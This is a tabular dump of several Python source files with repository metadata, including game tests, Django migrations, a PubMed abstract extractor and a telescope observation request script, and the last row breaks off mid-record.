blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
db520c55803ce3ffeb97f5b339bc73d74fb711f0
|
cb40aad84a35856ce5a8285ea7260f4183b1dd7a
|
/tests/model/test_properties.py
|
686bc3f6503e24b4cfda6093606dd26cd1f7e118
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
vyahello/trump-bullet-game
|
f71f2fe86a92ba89ea82af5cfecab504b13576d0
|
7648f9722471323ddec1aa6b6d7db38166bebc91
|
refs/heads/master
| 2021-09-08T09:31:49.459350 | 2021-08-29T08:26:14 | 2021-08-29T08:40:40 | 167,864,306 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,974 |
py
|
from typing import Tuple
import pytest
from app.model.properties import GameProperty, Color, Resolution, Border
from app import PropertyError
_rdba_color: Tuple[int, ...] = (1, 2, 3)
_resolution: Tuple[int, ...] = (10, 20)
_bottom: int = 5
def test_property_coordinates() -> None:
assert len(GameProperty.coordinates()) == 4
def test_calculate_jumper() -> None:
assert GameProperty.calculate_jumper() == 50
def test_color_as_rgba(color: Color) -> None:
assert color.as_rgba() == _rdba_color
def test_resolution_as_sequence(resolution: Resolution) -> None:
assert resolution.as_sequence() == _resolution
def test_resolution_top_height(resolution: Resolution) -> None:
assert resolution.top_height == _resolution[0]
def test_resolution_top_width(resolution: Resolution) -> None:
assert resolution.top_width == _resolution[1]
def test_resolution_bottom(resolution: Resolution) -> None:
assert resolution.bottom == _bottom
def test_border_is_top_left(screen_border: Border) -> None:
assert screen_border.is_top_left(10)
def test_border_is_top_right(screen_border: Border) -> None:
assert screen_border.is_top_right(10, 2)
def test_border_is_top_upper(screen_border: Border) -> None:
assert screen_border.is_top_upper(15)
def test_border_is_top_lower(screen_border: Border) -> None:
assert screen_border.is_top_lower(3, -10)
def test_border_is_not_top_left(screen_border: Border) -> None:
assert not screen_border.is_top_left(1)
def test_border_is_not_top_right(screen_border: Border) -> None:
assert not screen_border.is_top_right(30, 3)
def test_border_is_not_top_upper(screen_border: Border) -> None:
assert not screen_border.is_top_upper(1)
def test_border_is_not_top_lower(screen_border: Border) -> None:
assert not screen_border.is_top_lower(15, 2)
def test_resolution_error() -> None:
with pytest.raises(PropertyError):
Resolution(resolution=(0, 0, 0)).as_sequence()
|
[
"[email protected]"
] | |
ba55aa07f86bf85d7f55d854a6d3e64096f4000b
|
d80ef8c716bcc5ea54e87540dbf0463f15bf44ce
|
/libmproxy/contrib/wbxml/InvalidDataException.py
|
67f8ea93014bc2aaf814f9995cc5861007b63caf
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
YagiGo/YPTN
|
5043d22eb131c7164d3fa575f0c4e3d8a963dbf4
|
d7692a68ee1bf578536b4c09c566272210fc8b69
|
refs/heads/master
| 2018-10-16T03:44:18.024169 | 2018-07-24T08:53:57 | 2018-07-24T08:53:57 | 107,633,669 | 4 | 1 |
MIT
| 2018-06-08T09:04:29 | 2017-10-20T04:55:22 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,333 |
py
|
#!/usr/bin/env python
'''
@author: David Shaw, [email protected]
Inspired by EAS Inspector for Fiddler
https://easinspectorforfiddler.codeplex.com
----- The MIT License (MIT) -----
Filename: InvalidDataException.py
Copyright (c) 2014, David P. Shaw
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
class InvalidDataException(Exception):
pass
|
[
"[email protected]"
] | |
243b30d8a04317b70aab7c0bbadabf27a895a4a2
|
480a175ab2b3c012af2d1cddb79674fad1490fe5
|
/0x08-python-more_classes/tests/main.2.py
|
2cb60d1c599573c08cc695829729fe51c64ab27d
|
[] |
no_license
|
ianliu-johnston/holbertonschool-higher_level_programming
|
a8a6476fc6a7ac0bd8ae300f2196f17c13e1b36f
|
f6a7c9cddb2482991c2aadacb99aa66e64eb50eb
|
refs/heads/master
| 2021-04-29T11:12:56.820851 | 2017-05-10T00:48:17 | 2017-05-10T00:48:17 | 77,854,226 | 3 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 944 |
py
|
#!/usr/bin/python3
Rectangle = __import__('2-rectangle').Rectangle
new_rect = Rectangle(3, 4)
print("Dimensions of your new rectangle: {} x {}".format(new_rect.width, new_rect.height))
print("Area: {}".format(new_rect.area()))
print("Perimeter: {}".format(new_rect.perimeter()))
new_rect.width = 5
print("Width just changed. New Dimensions: {} x {}".format(new_rect.width, new_rect.height))
print("Area: {}".format(new_rect.area()))
print("Perimeter: {}".format(new_rect.perimeter()))
new_rect.height = 15
print("height just changed. New Dimensions: {} x {}".format(new_rect.width, new_rect.height))
print("Area: {}".format(new_rect.area()))
print("Perimeter: {}".format(new_rect.perimeter()))
print("Making another one.")
next_rect = Rectangle()
print("Dimensions of your new rectangle: {} x {}".format(next_rect.width, next_rect.height))
print("Area: {}".format(next_rect.area()))
print("Perimeter: {}".format(next_rect.perimeter()))
|
[
"[email protected]"
] | |
702e93ec385bbb5567fec0ac4ca70cf08f9f04db
|
7dbcf66e47684c652f9d90a47b2381cf846e003d
|
/pkg/Conf.py
|
d8e12155528eb0090ab0006f88fcc253282e3ede
|
[] |
no_license
|
hlanSmart/simple
|
531b9a8be524d29c43016c865f64132aa4bf3069
|
c8536edd4cec1f39e23a5ff35ae16f0efa15f323
|
refs/heads/master
| 2020-12-27T08:24:04.383170 | 2016-09-22T04:29:44 | 2016-09-22T04:29:44 | 68,556,669 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,020 |
py
|
#!/usr/bin/python
#coding:utf-8
import os,yaml
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def readServer(sg,sl=False): #sg ServerGroup 服务器组 sl ServerList 组列表
with open(os.path.join(BASE_PATH,'etc/server.yml'),'r') as f:
server=yaml.load(f)
if sl: #当ServerList为真时返回组,而不是组信息
li=[]
for i in server:
li.append(i)
return li
if sg in server:
gp=server[sg] #gp group 服务器组信息
for i in gp: #默认22端口在配置文件不存在,所以手动添加到返回结果
if len(gp[i])<3:
gp[i].append(22)
return gp
return False #Server Group 不存在时返回False
def readYaml(P):
try:
with open(P) as f:
return yaml.load(f)
except Exception as e:
print(e)
return False
|
[
"root@localhost"
] |
root@localhost
|
e4d3b1c290b0ee2787f51f3bb625a45c1c113234
|
6daa3815511b1eb1f4ff3a40b7e9332fab38b8ef
|
/tastesavant/taste/apps/profiles/migrations/0010_auto__add_field_profile_preferred_site__chg_field_profile_user.py
|
f631b68b525621e7885479041e53e8ea8b703f7e
|
[] |
no_license
|
kaizensoze/archived-projects
|
76db01309453606e6b7dd9d2ff926cfee42bcb05
|
d39ac099cb40131bac5de66bde7d0e2db5f74189
|
refs/heads/master
| 2021-05-31T12:16:17.800730 | 2016-02-23T00:27:56 | 2016-02-23T00:27:56 | 14,407,212 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,513 |
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Profile.preferred_site'
# The default value, 3, should refer to the NYC site.
db.add_column('profiles_profile', 'preferred_site',
self.gf('django.db.models.fields.related.ForeignKey')(default=3, to=orm['sites.Site']),
keep_default=False)
# Changing field 'Profile.user'
db.alter_column('profiles_profile', 'user_id', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['auth.User'], unique=True))
def backwards(self, orm):
# Deleting field 'Profile.preferred_site'
db.delete_column('profiles_profile', 'preferred_site_id')
# Changing field 'Profile.user'
db.alter_column('profiles_profile', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], unique=True))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'profiles.friendship': {
'Meta': {'object_name': 'Friendship'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notice_sent_to_user_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Profile']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'profiles.profile': {
'Meta': {'object_name': 'Profile'},
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'blogger': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'digest_notifications': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'favorite_food': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'favorite_restaurant': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'friends': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'friends'", 'to': "orm['auth.User']", 'through': "orm['profiles.Friendship']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'last_sync_facebook': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_sync_foursquare': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'notification_level': ('django.db.models.fields.CharField', [], {'default': "'instant'", 'max_length': '16'}),
'preferred_site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'type_expert': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'type_reviewer': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'zipcode': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['profiles']
|
[
"[email protected]"
] | |
ad784210df07d410b4d9d0b3795e111aa61b9193
|
b7453e5a2700f2017a6f783eaf3990ee2486cd65
|
/test/utils/test_clean_identity.py
|
54c6c0a2df4ef8f53c92989877f93ce940c57635
|
[
"Apache-2.0"
] |
permissive
|
LaRiffle/cleaning-scripts
|
8525164cca8336b67a2362d6907414e27ca088fa
|
08f360721056d30befe8d58ded583a4a5d126184
|
refs/heads/master
| 2020-07-28T06:52:47.673033 | 2019-11-19T15:26:19 | 2019-11-19T15:26:19 | 209,343,798 | 0 | 0 |
Apache-2.0
| 2019-09-20T13:13:25 | 2019-09-18T15:33:16 |
Python
|
UTF-8
|
Python
| false | false | 233 |
py
|
from scripts import utils
def test_clean_identity():
assert utils.clean_identity(None) == ""
assert utils.clean_identity("NaN") == ""
row_input = "Holà chicanos"
assert utils.clean_identity(row_input) == row_input
|
[
"[email protected]"
] | |
1b5cd48ff39ee1da8dbaf2f526d75d0746e5c1e6
|
f1d9df04036fc43c9e5cc7998b83261f4daa94b8
|
/management_commands/insert_base_data.py
|
cf87a7c11fd7db6f4e396e72c0e9d41bce402ce1
|
[] |
no_license
|
Eaterator/web
|
019eb6547995be30b3468e5c44ecc52f05858fb4
|
9c598607f76ad770c66d85c47ffcec05f92f4d66
|
refs/heads/master
| 2021-01-09T20:30:13.417308 | 2017-04-25T02:44:35 | 2017-04-25T02:44:35 | 81,286,177 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,324 |
py
|
from application.auth.models import Role
from application.recipe.models import Source
from application.base_models import db
def insert_role_data():
roles = [
{
'name': 'regular',
'type_': 'consumer',
'is_admin': False
},
{
'name': 'corporate',
'type_': 'business',
'is_admin': False
},
{
'name': 'admin',
'type_': 'admin',
'is_admin': True
}
]
if len(Role.query.all()) > 0:
return
for role in roles:
new_role = Role(**role)
db.session.add(new_role)
db.session.commit()
def insert_source_data():
sources = [
{
'base_url': 'foodnetwork.com',
'name': 'Food Network'
},
{
'base_url': 'epicurious.com',
'name': 'Epicurious'
},
{
'base_url': 'therecipedepository.com',
'name': 'The Recipe Depository',
},
{
'base_url': 'allrecipes.com',
'name': 'All Recipes',
},
{
'base_url': 'bonappetit.com',
'name': 'Bon Appetit'
},
{
'base_url': 'food.com',
'name': 'Food'
},
{
'base_url': 'simplyrecipes.com',
'name': 'Simply Recipes'
},
{
'base_url': 'bbcgoodfood.com',
'name': 'BBC Good Food'
},
{
'base_url': 'williams-sonoma.com',
'name': 'Williams Sonoma'
},
{
'base_url': 'finedininglovers.com',
'name': 'Fine Dining Lovers'
},
{
'base_url': 'thekitchn.com',
'name': 'The Kitchn'
},
{
'base_url': 'chowhound.com',
'name': 'Chow'
},
{
'base_url': 'myrecipes.com',
'name': 'My Recipes'
},
{
'base_url': '',
'name': 'Other'
}
]
for source in sources:
exists = Source.query.filter(Source.name == source['name']).all()
if len(exists) <= 0:
new_source = Source(**source)
db.session.add(new_source)
db.session.commit()
|
[
"[email protected]"
] | |
d74da5f980c51f8a87e1f3491b38cb906651ba91
|
995c52ad5a0a3039ad37a4d2f07b06dcbbcf3961
|
/tantalus/migrations/0059_auto_20180810_1837.py
|
f4ba3f19bfd13e80fa47e558107374b522b8b533
|
[] |
no_license
|
nafabrar/tantalus
|
d02cce3923205191f00b30e80152a0be7c091d6a
|
d8552d40472c29bc617b45a1edaf87c6624b824d
|
refs/heads/master
| 2022-12-24T15:53:52.034999 | 2020-10-07T22:26:35 | 2020-10-07T22:26:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 945 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-08-10 18:37
from __future__ import unicode_literals
from django.db import migrations
def populate_sequence_file_info(apps, schema_editor):
FileResource = apps.get_model('tantalus', 'FileResource')
SequenceFileInfo = apps.get_model('tantalus', 'SequenceFileInfo')
for file_resource in FileResource.objects.all():
sequence_file_info = SequenceFileInfo(
file_resource=file_resource,
owner=file_resource.owner,
read_end=file_resource.read_end,
genome_region=file_resource.genome_region,
index_sequence=file_resource.index_sequence,
)
sequence_file_info.save()
class Migration(migrations.Migration):
dependencies = [
('tantalus', '0058_historicalsequencefileinfo_sequencefileinfo'),
]
operations = [
migrations.RunPython(populate_sequence_file_info)
]
|
[
"[email protected]"
] | |
9b9a14f2985d9dd1d7bc6ef666b5d40a2a9a5256
|
a7e0784b697b6c57920e16e2f54ea0ed2225c0e0
|
/data/clingen_raw_to_training.py
|
47d0357cb8921e5915cdc80d02e9879fcf3e88c3
|
[] |
no_license
|
rumeysa77/ClinGenML
|
17e1a3786b8711387a61707252307aab13e682c5
|
c3bf6fbf7d0fe6c1311ce0fcfb4e26d8331bbc7d
|
refs/heads/master
| 2023-03-22T04:41:40.669592 | 2021-02-24T09:04:29 | 2021-02-24T09:04:29 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,815 |
py
|
"""
This file processes the raw excel sheet and extract data
"""
import time
import csv
from collections import defaultdict
from Bio import Entrez
from pathlib import Path
import unicodedata
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
# clean text does not tokenize anything!
def clean_text(text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
def reduce_whitespace(text):
return ' '.join(text.split())
major_5_panels = {'experimental-studies', 'allele-data', 'segregation-data', 'specificity-of-phenotype', 'case-control'}
label_vocab = ['experimental-studies', 'allele-data', 'segregation-data', 'specificity-of-phenotype', 'case-control']
class DatasetExtractor(object):
def __init__(self, path=None):
self.major_5_pmid_to_panel = defaultdict(set)
header = None
if path is not None:
with open(path, encoding='utf-8', errors='ignore') as f:
reader = csv.reader(f)
for i, line in enumerate(reader):
if i == 0:
header = line[:-2]
elif line[4] != '': # ClinVar ID cannot be null
if line[1] in major_5_panels:
self.major_5_pmid_to_panel[line[2]].add(line[1])
def fetch_title_abstract_keywords(self, one_id):
ids = one_id
Entrez.email = '[email protected]'
handle = Entrez.efetch(db='pubmed',
retmode='xml',
id=ids)
results = Entrez.read(handle)
# retrieving for only 1 result
for i, paper in enumerate(results['PubmedArticle']):
abstract = []
if 'Abstract' in paper['MedlineCitation']['Article']:
for section in paper['MedlineCitation']['Article']['Abstract']['AbstractText']:
abstract.append(section)
else:
continue
abstract = " ".join(abstract)
title = paper['MedlineCitation']['Article']['ArticleTitle']
keywords = []
for elem in paper['MedlineCitation']['KeywordList']:
for e in elem:
keywords.append(e)
keywords = ' '.join(keywords)
return title, abstract, keywords
return None
def merge_text(self, title, abstract, keywords, entrez=False):
# a standard function to map
text = ''
if not entrez:
text = title + " || " + " ".join(keywords.split('/')) + " || " + reduce_whitespace(clean_text(abstract))
else:
text = title + " || " + keywords + " || " + reduce_whitespace(clean_text(abstract))
return text
def generate_pmid_panel_set(self, log=False, tqdm=False, notebook=False):
# will call Entrez BioPython to grab abstracts
data = []
pmid_to_data = {}
start = time.time()
cnt = 0
for k, v in self.major_5_pmid_to_panel.items():
cnt += 1
res = self.fetch_title_abstract_keywords(k)
if res is None:
continue # 24940364 is not found...
text = self.merge_text(*res)
# label = ['0'] * len(label_vocab)
label = []
for v_i in v:
label.append(str(label_vocab.index(v_i)))
data.append('\t'.join([text, ' '.join(label)]))
pmid_to_data[k] = '\t'.join([text, ' '.join(label)])
if log:
if cnt % 100 == 0:
print(cnt, time.time() - start, 'secs')
return data, pmid_to_data
def write_data_to_csv(self, data, csv_file_path):
# expect `data` directly from `generate_pmid_panel_set`
with open(csv_file_path, encoding='utf-8', errors='ignore', mode='w') as f:
for line in data:
f.write(line + '\n')
def write_pmid_to_list(self, path):
# it will directly save as "pmids.txt", which is what PubMunch expects
# call this function to generate a list of pmid
# so you can use PubMunch to download
p = Path(path)
p.mkdir(exist_ok=True)
with open('{}/pmids.txt'.format(path), 'w') as f:
for pmid in self.major_5_pmid_to_panel.keys():
f.write(pmid + '\n')
def __sub__(self, other):
assert type(other) == type(self)
new_pmids = set(list(self.major_5_pmid_to_panel.keys())) - set(list(other.major_5_pmid_to_panel))
de = DatasetExtractor()
for pmid in new_pmids:
panel = self.major_5_pmid_to_panel[pmid]
de.major_5_pmid_to_panel[pmid] = panel
return de
if __name__ == '__main__':
# testing
de = DatasetExtractor("../corpus/ML Data (as of 3_17_19).csv")
print(de.merge_text(*de.fetch_title_abstract_keywords("10206684")))
|
[
"[email protected]"
] | |
ab0d95439f8363b720d81aa80ae3aa74a0432e28
|
104005986bccea0a4213cbd55d833c95baf2f4fa
|
/drivers/phot_drivers/LCOGT_template_single_request.py
|
c6603728c1e635419c96b9c4a2e6edda588ecfe7
|
[] |
no_license
|
lgbouma/cdips_followup
|
8a92ec9a31b405d316c668a6d42ce10ad47f0501
|
99ac6c6c709f96a58083a5ff7c4cf2d4f0b554a8
|
refs/heads/master
| 2023-08-14T02:33:17.841926 | 2023-08-01T00:46:19 | 2023-08-01T00:46:19 | 206,371,538 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,229 |
py
|
"""
Given a source_id, make LCOGT photometry followup requests, and optionally
submit them to the LCOGT API.
"""
import numpy as np
from astropy.time import Time
from cdips_followup.manage_ephemerides import (
query_ephemeris, get_ephemeris_uncertainty
)
from cdips_followup.LCOGT_dedicated_requests import (
get_dedicated_request,
given_dedicated_requests_validate_submit
)
from astrobase.services.identifiers import tic_to_gaiadr2
TRANSITTYPEDICT = {
'all': ['OIBEO', 'IBEO', 'OIBE', 'OIB', 'BEO'],
'partials': ['OIB', 'BEO'],
'totals': ['OIBEO', 'IBEO', 'OIBE'],
'fulltotals': ['OIBEO']
}
def main():
##########################################
# CHANGE BELOW
savstr = '20230419_tic402980664_23B' # eg, 20191207_TOI1098_request_2m_tc_secondary. "ephemupdate" if it is one. (this cancels pending observations)
overwrite = 1
validate = 0
submit = 0
tic_id = '402980664' # '120105470'
source_id = None # '6113920619134019456' # can use instead of TIC
filtermode = 'ip'# 'zs', 'gp', 'ip'
#telescope_class = '1m0' # '1m0', '2m0', 'special'
telescope_class = 'special' # '1m0', '2m0', 'special'
ipp_value = 1 # usually 1
#max_search_time = Time('2022-12-31 23:59:00')
max_search_time = Time('2024-01-31 23:59:00')
verify_ephemeris_uncertainty = 1 # require t_tra uncertainty < 2 hours
inflate_duration = 0 # if t_tra uncertainty > 1 hour, inflate tdur by +/- 45 minutes per side
transit_type = 'totals' # see above
max_n_events = 99 # else None. n_events is per eventclass.
raise_error = False # raise an error if max_duration_error flag raised.
max_duration_error = 30 # the submitted LCOGT request must match requested durn to within this difference [minutes]
sites = ['Palomar'] # Default None for LCOGT. Could do e.g., 'special' and ['Keck Observatory']
#sites = ['Keck Observatory'] # Default None for LCOGT. Could do e.g., 'special' and ['Keck Observatory']
#sites = ['Cerro Paranal'] # Default None for LCOGT. Could do e.g., 'special' and ['Keck Observatory']
force_acceptability = 50 # None or int.
# CHANGE ABOVE
##########################################
max_airmass_sched = 2.5
manual_ephemeris = False
manual_ephemeris = True # FIXME
create_eventclasses = TRANSITTYPEDICT[transit_type]
submit_eventclasses = TRANSITTYPEDICT[transit_type]
if source_id is None:
assert isinstance(tic_id, str)
source_id = tic_to_gaiadr2(tic_id)
if manual_ephemeris:
period = 18.559/24
period_unc = 0.001/24
epoch = 2457000 + 1791.2972827806442
epoch_unc = 1e-5
duration = 1.04
else:
# get ephemeris from ephemerides.csv
d = query_ephemeris(source_id=source_id)
period, epoch, duration = (
d['period'], d['epoch'], d['duration']
)
period_unc, epoch_unc, duration_unc = (
d['period_unc'], d['epoch_unc'], d['duration_unc']
)
if verify_ephemeris_uncertainty:
delta_t_tra_today = (
get_ephemeris_uncertainty(epoch, epoch_unc, period, period_unc, epoch_obs='today')
)
if delta_t_tra_today*24 < 0:
msg = f'ERR! Got negative ephem unc of {delta_t_tra_today*24:.1f} hr. Need to give a believable ephem unc..'
raise ValueError(msg)
if delta_t_tra_today*24 > 2:
msg = f'ERR! Got ephem unc of {delta_t_tra_today*24:.1f} hr. This is too high.'
raise ValueError(msg)
if delta_t_tra_today*24 > 1:
msg = f'WRN! Got ephem unc of {delta_t_tra_today*24:.1f} hr. This is risky.'
print(msg)
else:
msg = f'INFO! Got ephem unc of {delta_t_tra_today*24:.1f} hr. This is fine.'
print(msg)
if inflate_duration:
assert verify_ephemeris_uncertainty
if delta_t_tra_today*24 > 1:
msg = f'... inflating transit duration for scheduling pursposes by 1.5 hours.'
print(msg)
duration += 1.5 # add
# "requests" is a list of lists. Higher level is each eventclass. Level
# below is each event, in that eventclass.
requests = get_dedicated_request(
savstr, source_id, period, epoch, duration, create_eventclasses,
overwrite=overwrite, max_search_time=max_search_time,
filtermode=filtermode, telescope_class=telescope_class,
ipp_value=ipp_value, sites=sites,
force_acceptability=force_acceptability,
max_airmass_sched=max_airmass_sched
)
# if a maximum number of events is set, impose it!
if isinstance(max_n_events, int):
_requests = []
for ix in range(len(create_eventclasses)):
print('starting with {} {} events.'.
format(len(requests[ix]), create_eventclasses[ix])
)
for eventclass in requests:
_eventclass = []
starttimes = []
for req in eventclass:
starttimes.append(req['requests'][0]['windows'][0]['start'])
# sort by start time, cut to get the closest ones.
sort_times = np.sort(starttimes)
sel_times = sort_times[ : max_n_events]
for req in eventclass:
starttime = req['requests'][0]['windows'][0]['start']
if starttime in sel_times:
_eventclass.append(req)
if len(_eventclass) > 0:
_requests.append(_eventclass)
if len(_requests) == 0:
print('WRN!: got no times')
return
assert len(_requests[0]) <= max_n_events
requests = _requests
print('WRN!: trimmed to {} events.'.format(len(requests[0])))
if len(sel_times)>0:
print('WRN!: max time: \n{}'.format(repr(sel_times[-1])))
print('\nWRN!: selected times: \n{}'.format(repr(sel_times)))
else:
print('WRN!: got no times')
given_dedicated_requests_validate_submit(
requests, submit_eventclasses, validate=validate, submit=submit,
max_duration_error=max_duration_error, raise_error=raise_error
)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
10c75430230872f750e9ed2c0a241436c9120a7f
|
b509ef07d752e987f4cb84d1abd4c3a98488a6c7
|
/resources/lib/streamlink/plugins/nownews.py
|
02bd76def1234a8b05929f26bb670853a147f7ba
|
[
"BSD-2-Clause"
] |
permissive
|
Twilight0/script.module.streamlink.base
|
d91245d1a43d6b3191b62a6eb4b1cf70598ed23e
|
c1e4628715a81806586b10323b8cb01424bbb6fc
|
